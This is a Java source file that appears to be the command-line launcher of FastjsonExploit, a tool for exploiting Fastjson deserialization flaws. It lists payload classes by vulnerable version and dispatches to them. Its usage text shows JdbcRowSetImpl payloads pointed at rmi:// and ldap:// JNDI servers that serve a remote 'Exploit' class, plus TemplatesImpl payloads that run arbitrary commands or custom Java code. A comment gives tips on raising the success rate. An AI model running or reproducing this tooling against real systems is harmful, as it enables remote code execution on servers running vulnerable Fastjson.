import payloads.ObjectPayload;
import payloads.annotation.Dependencies;
import payloads.annotation.PayloadType;
import payloads.annotation.VulVersion;
import util.JarFileReader;
import util.Strings;
import java.lang.reflect.Method;
import java.util.*;

/*
注意：在运行请，为了能提高成功率，清在目标jdk版本以下的运行FastjsonExploit
*/

public class FastjsonExploit {
    private static void printUsage() {
        //http://www.fuhaoku.com/fuhaotuan/185.html
        JarFileReader jfr = new JarFileReader();
        String banner = jfr.read("banner");
        System.err.println(banner);
        System.err.println("Usage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]");
        System.err.println("Exp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit \"cmd:calc\"");
        System.err.println("Exp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit \"code:custom_code.java\"");
        System.err.println("Exp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 \"cmd:calc\"");
        System.err.println("Exp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 \"code:custom_code.java\"");
        System.err.println("\nAvailable payload types:");

        final List<Class<? extends ObjectPayload>> payloadClasses = new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
        Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize

        final List<String[]> rows = new LinkedList<String[]>();
        rows.add(new String[] {"Payload","PayloadType", "VulVersion", "Dependencies"});
        rows.add(new String[] {"-------","-----------", "----------", "------------"});
        for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
            rows.add(new String[] {
                    payloadClass.getSimpleName(),
                    Strings.join(Arrays.asList(PayloadType.Utils.getPayloadTypes(payloadClass)), ", ", "", ""),
                    Strings.join(Arrays.asList(VulVersion.Utils.getVulVersion(payloadClass)),", ","",""),
                    Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
            });
        }

        final List<String> lines = Strings.formatTable(rows);

        for (String line : lines) {
            System.err.println("    " + line);
        }
    }

    public static void main(String[] args) {
        if(args.length <= 0){
            printUsage();
            System.exit(0);
        }

        String payloadName = "payloads." + args[0].trim();

        boolean flag = false;
        final List<Class<? extends ObjectPayload>> payloadClasses = new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
        for(Class<? extends ObjectPayload> payloadClasse:payloadClasses){
            if(payloadName.equals(payloadClasse.getName())){
                try {
                    Method m = payloadClasse.getDeclaredMethod("process", String[].class);
                    m.invoke(payloadClasse.newInstance(),new Object[]{args});
                } catch (Exception e) {
                    e.printStackTrace();
                }
                flag = true;
            }
        }

        if(!flag){
            System.out.println("[*] The input payload does not exist!");
        }
    }
}
